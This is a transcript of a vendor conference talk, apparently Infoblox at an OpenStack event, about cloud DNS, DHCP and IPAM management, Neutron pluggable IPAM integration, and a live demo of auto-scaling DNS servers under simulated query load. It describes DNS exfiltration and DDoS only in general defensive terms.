 The story here from Infoblox and what we're here to speak with you guys today about is cloud IP allocation, cloud IPAM, and cloud-based DNS service. So Infoblox is a company, not a product, and our product is solutions for, I'm just going to hold this up to my mouth, I think we're having microphone issues. The product here is Infoblox's DDI suite, so that's DNS, DGCP, and IPAM, running in, of course, OpenStack, running in Azure, running in VMware, running in Amazon Web Services. So this is available for your private cloud, for your public cloud, as well as your hybrid cloud-based solutions. And basically what we do is provide a single unified pane of glass for managing your DNS and IPAM. It provides consistent policies across all of your cloud, all of your environments, and provides visibility and analytics for how the network space is being used. Right? There's this very overlapping situation that you wind up with, with overlapping network space in the public and the private cloud areas. And we're helping deal with all of that. So I'd like to introduce you to what we lovingly refer to as our stacker name. It's an acronym of acronyms, the domain name system, of course, turning names into numbers and back again. So OpenStack.org is represented there by a V4 and a V6 address, which I hope I got right. And on the reverse side, we turn that back around, and that's very important for internal services that may be doing a checkup to make sure that you are who you say you are. SSH is a famous example of that. If you've ever SSH to a server with a broken DNS resolver, you've sat there and waited forever before you get your command prompt back, right? That's reverse DNS. And our solution is making sure that forward matches reverse for you. So on the DHCP side, that's your traditional leasing of addresses, right? I have a pool of address space, and I'm a dynamic client. So I need an IP address who's going to give it to me. The Infobox DHCP server does. And we hand them out from available IPv4 and IPv6 address space. So there's a little star down there. It's really tiny and impossible to read in the back. But I'd like to say that it hands out addresses from the available space and occasionally the unavailable space too, right? IPv4 is a very client-driven protocol. And so it's not very smart. It just gets whatever the server gives it. And if you've statically configured something, that might be a conflicting address. And the rest of your infrastructure is totally unaware of that. Big time problem, right? IP conflict nobody likes. And that's what the IPAM solution is there for, the IP address management solution. And IP address management is out there constantly learning from the network infrastructure itself. There's no hiding from IPAM, right? It learns from routers. It learns from switches and firewalls. Layer two and layer three elements from cam tables, from routes. And even if you've got a personal firewall or some security instance that's blocking that stuff from happening, if you're talking on the network, we know you're there, right? And we're tracking that address for you. So that's for planning, managing, and tracking, right? So the idea is I'm going to deploy or merge and acquire another business unit or deploy new networks out at a remote campus or out on a WAN somewhere. I want to make sure that space, if it is overlapping, I'm managing that correctly inside of tenant or provider networking. And if it's not overlapping, and I'd like to keep it that way, I need a tool that's going to help me track all of that. So that's what we're there doing. In the Etsy reference model of things, we are a VNF, right? So we're a virtual network function. And those virtual network functions are provided in the tiny little blue boxes that you can't read. So that's IPAM, virtual DNS, virtual DHCP. And what we call our DNS firewall. So that's Infoblox's DNS server with an embedded security function. And that security function is helpful from an outside in perspective, as well as an inside out perspective. And we'll talk about that in a little bit later. But why does this matter? We've already discussed the idea of overlapping IP space. But DNS and those associated IP addresses, so your compute trying to find its controller, your storage trying to find its controller, that all starts with a DNS request. And if that piece isn't working, bad news, right? That's really bad for cloud and really bad for uptime. So every cloud solution handles this a little differently. Most of some of the public clouds, like AWS, for example, you're not allowed to run a DHCP server inside it that give you an IP for your instance. In the case of an open stack, you're running your own DHCP, probably DNS mask if you're using baked in neutron and baked in services today. It could be some external SDN provider as well. Could be a contrail or a new watch or what have you, right? And at the end of the day, this is multiple deployments, multiple products, and just potentially a very big mess across the IP space, unless you've got cross-functional visibility and control across all of these. And again, that's Infoblox as a single pane of glass for you. So those cloud solutions can only see inside their own domain. They can't see each other. And that's by design. You've got security breakpoints in between each one of those. And if you'd like something that can see across all of them, that's what we're here to do. And a big part of the way we do that is through the Neutron Plugable IP address management framework. So in the old days, in Kilo and Pryor, this was an inbuilt function. And it just sort of happened within the natural ecosystem of open stacks. Since Liberty and going forward, there's something called the Plugable IPAM framework. If you look inside your neutron.conf, there's an area for you to say, should I just use built-in IPAM or should I use the Plugable IPAM framework? That Plugable IPAM framework speaks Infoblox's API. So what you do is define what we call our gridmaster. It's our control plane. You tell it to go to the gridmaster for the next available network and the next available IP. And now your single pane of glass that's managing all of your tenant and provider networking space is aware. It's actionable from that perspective about how to give out the next network and the next IP so you don't find yourself in an overlapping situation, if such is your desire. That cloud network automation plug-in also does a couple of very important things for you. It doesn't just say, hey, here's an IP address to neutron and go to bed. It goes out to that gridmaster. And as step three there, very importantly, we're creating that host record. So the forward and reverse mapping I was talking about before that happens as part of the IP allocation procedure. And it's just handled for you. So there's no more having to deal with designate or some off-board external management solution or manually entering a whole bunch of stuff in your bind server. All of that stuff is simply removed from necessity. And that virtual machine then gets spun up perhaps by heat, perhaps by some external virtual controller. Almost nobody I know is running exactly one cloud or running exactly one controller platform. There's a whole bunch of them. And so again, that single pane of glass that's maintaining that relationship for you. And so that's probably beating IP addresses to death more than enough, huh? But nobody goes to IP addresses in web browsers and you infrequently configure them for services to speak to each other, especially not IPv6 ones. They're a giant pane in the butt to type. They're very long. They're very complex and very hard to remember. So you may not ever go to Facebook, but they do something very kitschy in here. They add FACEBOOC inside the IP address. So it's actually a neat idea. It helps you remember things a little bit, but honestly, no way, right? So that's why everybody uses DNS all day long from a human interaction perspective. And we also use it for machine to machine perspective because it affords us a level of portability. If my server is called server one and I'm referencing server one, well, I can do all sorts of interesting things behind the label server one and you never know what happened, right? If I need to upgrade, if I need to patch, if I need to change over to server two but still call it server one, I can do that. And hide behind that name of server one. If I have an IP address, well, now I need a load balancer or some other bump in the wire to help manage all of that and it just gets messy real fast, right? So we've got lots of options here. We can have host files and you can type in the name of things and rsync that until you're blue in the face and sure that sounds like fun or missing yellow pages if anybody's ever worked on a sun machine, I'm sorry. And getting back to the century, everybody's using DNS to do this now, right? So the concept here is that binds everything together and if you know what DNS is and you know what bind is, I'm sorry for the terrible joke, but that is truly what's going on here. The DNS, the naming system is binding together all of these nodes that are building out your cloud and your clusters for you. And so failing that service means failing your very important application and everything else that's driving it. So that quick primer on DNS, not everybody's a DNS nerd. It took me a bunch of years. I've been at Infoblox for nine and a half years. I'm still learning. There are parts of DNS I had no idea existed. It's an exciting time to work at Infoblox, but all of DNS is DNS, UDP and TCP based. There's no external protocol type stuff you need to understand other than it's mostly UDP based. So if you're a stateful firewall, this means a nightmare for you. And if there's some zone transfer going on or some very large DNS requests, they may go over to TCP as well, right? So now you're considering UDP rules and TCP rules and varying ports on the response side of everything. So just keeping track of DNS as a protocol can be an onerous thing to have to do. You have what's referred to as a primary authoritative server. So if you have zone.org, for example, you've got a primary server in charge of that and a number of slave servers that represent that service to the outside world. And those are your secondary authoritative servers. And there's also something called a caching or a recursive caching server. And that's the thing that your internal client, in a lot of cases in AD environments, this might be a domain controller, or in the case of your VMs, this is probably something like the IP that DNS mask has given your client when it booted up. It might be built into OpenStack, it might be a corporate DNS server, it could be any of those things. All right, so the important thing to remember about DNS caching is it's actually, it's read from right to left, right? There's the root servers first, so you go to root and say, hey, root, where is comm, where is org? Where is this bottom of the DNS? And then it tells you where that is and then it iterates through these steps until you ultimately get to the IP address that's mapped to your name for you. So we start with an inferred dot and you never type the dot, right? You type www.openstat.org and you're done. But it's actually openstat.org dot. And that dot is very important because that's where the conversation starts and you can see there's one, two, three hops in just finding this label and every time you see that hop, every time there's that iteration, there's a chance for a bad guy to sneak in the wrong IP address or sneak in the wrong label to send you to his server or her server where she can capture your information, capture your data and do something bad with it. So why do we care about auto scaling that service? Right, we already talked about why DNS is so critical, without it, nothing works. But there are sort of two reasons that I like to talk about. One of them is scary stuff and the other one is like normal stuff, right? So scary stuff, DNS is a vulnerable protocol. It's internet facing. It's either outside your firewall or in a DMZ. It's directly talking to the wild, wild West and people are trying to attack it because they know it's a place where they can take your services offline. There is also the inside out attack. So earlier I spoke about DNS firewall. Infobox's DNS firewall is for the inside out kind of attack where the bug is made its way into your network or is already on your network and wants to steal sensitive data like a spreadsheet full of credit card numbers or your boss's email address or whatever and it sneaks it out over DNS the protocol. And it does this right through proxy servers, right through firewalls, right through IDSs. IDSs might see it but it's already too late and the firewalls and security endpoints at the edge of the world are just letting this happen because DNS is a required protocol. It has to go out, right? So ultimately we're catching the scary stuff and that takes compute and memory and resources and cycles, right? So at some point if you've got a large enough network you might need to scale that out in order to manage it. The outside in attack is your standard DDoS conversation. There's a lot of inbound queries trying to overwhelm your resources. So now you need more resources and having to do that manually is just not fun. It takes time and time as we all know during an attack is an issue. And then there's the normal stuff, maybe your network is growing, maybe you acquired something, maybe you're at a trade show like OpenStack and more people walk in here and now all of a sudden we need to have more capacity because there's more people. So we plan for that, right? We make some advances and we create some auto scaling rules and when we hit a certain point we expand and add more traffic to it. But that number one reason is generally abuse. People are either trying to steal your data or they're trying to take out your DNS server and either of these equals a failure on the network and on the service, right? The network exists in order to serve your service. So the 10,000 foot view of what we're doing here, Phantom Domain Attack is one example of an attack and if my internet connection is working we're gonna do a live demonstration of how this works but the inbound traffic causes a member to reach a certain period of load and once it reaches that amount of load it spins up a new additional member, right? So that overload condition gets identified and you set the policy on what overload really means. I've set some aggressive timers for what we're gonna talk about here today but it might be a thousand queries, it might be 2,000, it might be 20,000. So you baseline what normal looks like and then you decide what abnormal looks like and start growing from there. So I'm gonna go ahead and start up the load generator here so that we're not stuck waiting on something to fill itself out and we should have outstanding. Let's see, this is gonna be really tiny and this microphone kind of stinks so let me move it real quick. Is that working well? Outstanding. So let's make this a little bigger. Familiar with eye charts. It's not fun to see from the back of the room. This is the how fast can you type part of the demonstration, right? So I'm running a load generator here that's generating 300 queries per second. Doesn't sound like a whole lot but it's enough in order for us to normalize and baseline some traffic. Helps to be in the right directory. So we're gonna have to tiny size this one so it fits on the screen a little. And what we're looking at here is some standard open stack CLI output, right? Up at the top there is a Cilometer meter check. So each one of these on the left in the resource ID field represents a running virtual machine of infoblox. Following that is the meter that we've installed for it. So this is as simple as pip install Cilometer infoblox and networking dash infoblox and heat dash infoblox. There are three moving parts that we leveraged to make use of all of this but there's no other than the actual GitHub software you don't need to do a heck of a lot to your cloud in order to leverage the auto scaling function. And that meter has a gauge on it and we're seeing right now 300 queries per second and then we got a little timestamp over here telling us the last time we saw that. Now importantly underneath him are our two alarms, right? So the alarm for what's high queries per second and the alarm for what's low queries per second. And then underneath him are the various virtual machines that are already running. So I happen to have a CSR running the infoblox grid master and one member. So we never scale down to zero, right? Scaling down to zero for DNS would be a bad thing. You wanna have one member always running otherwise you're not gonna get any answers. And what fun would that be? So our topology here is pretty simple. We've got our router, we've got our outbound, our egress over here. The grid master, the member and that router that's running in there. By the way I'm running a router here because the infoblox DNS service supports anycast. So we peer over BGP or OSPF with some layer three entity and the built in neutron layer three router unless somebody wants to prove me wrong with Okada or Pyke. I don't think it supports peering still with internal devices for OSPF or BGP. So third party router in some regard or just run it on a flat network that can talk to a router or something that can run those two protocols, right? And then you get a nice common IP address that never changes as your DNS server IP. And under orchestration, you'll see the three stacks that represent that elastic DNS VNF. And there are some resources that were installed with that pip install that I was talking about. So infoblox, grid, anycast, loopback. See if we can do this, yeah, much better. So we've got the anycast loopback, the BGP listener, the neighbor. You can deploy us in HA pairs if you like VRRP and you still think like an old network guy. Name server grouping, which allows an abstraction of how to manage things, the various bits and pieces that are necessary for heat to orchestrate into existence infoblox elements, right? An entire grid. So you can do this whole thing programmatically. And then the actual infoblox interface itself here. HTTPS listener, it's got an out of band management port. You can deploy it in, it slices, it dices, it makes jillions for eyes. You can deploy it in any number of different ways with the interfaces facing the networks you need it to face, right? So as our, we're not gonna need that. As our low generator is running down here, we're gonna see some new compute entities come into existence. Dundas, let's get this guy to fit on one screen. Hurtin' my eyes. There's our instances. And here's our topology of running services. So what we're gonna do here is launch another one of those load generators and we're gonna simulate an attack. We're gonna generate enough traffic to trip that policy and tell it it's time to make some new infoblox. So I think 1,400 queries per second ought to do it. So we'll prime that up and out they go. Now we'll let that run in the background a little ways. This takes a moment because Cilometer is periodically grabbing those samples, right? So once a minute, we're gonna see one of those new samples and eventually that samples will match what it is we're pinging away in the background here. And what that will do is trip that alarm high, right? So we're in an okay, okay state right now. Things are just humming along and doing DNS queries the way we normally expect them. As soon as we have too many DNS queries, bam. Policy kicks in. The policy in this case is to add two or three additional VMs. Those VMs spin up, they join the anycast cluster and all of your services now exist behind that one common IP address. So let's see where we stand. Still at 300. This is the hardest part of our presenter's job is waiting for the paint to dry and talking about it at the same time, right? Watching grass grow. So all that load is being applied to the VNF. We can talk about the exfiltration thing a little bit I suppose. The exfiltration function again is data being captured on your network and then shipped out to the outside world via DNS as a super highway for that, right? So the idea there is you can take anything. It can be credit cards, it can be a picture. In fact, that's gonna take itself a moment. So I'm gonna do something that you're probably never supposed to do. Let's do an on-the-shelf selfie here. Just for right now, say hi, everyone. All right, so now we've got a picture and it's a right now picture, nothing up my sleeve. And let's share that picture with my laptop so that we've got it locally. Let that guy finish copying while we still finish up our load demonstration here. Our magic scaling go. So this is about 154. As we are running out of time and I'm taking too long, I'm just going to show you the event. It would be helpful if the traffic was actually hitting our node. Scale down policy. Clipping away, deleting nodes. Okay, he's here. Yep, okay. So my apologies there, it did run out of time but the policy kicks in, scales up, scales down. It adds two nodes, deletes two nodes, whatever you set the policy to be. So we've got this running in our booth at D5, D3 as well. So please do feel free to swing by and we'll show you the thing live in action over there as well, as well as the exfiltration piece. So thanks for your attention, thanks for your time and happy infoboxing.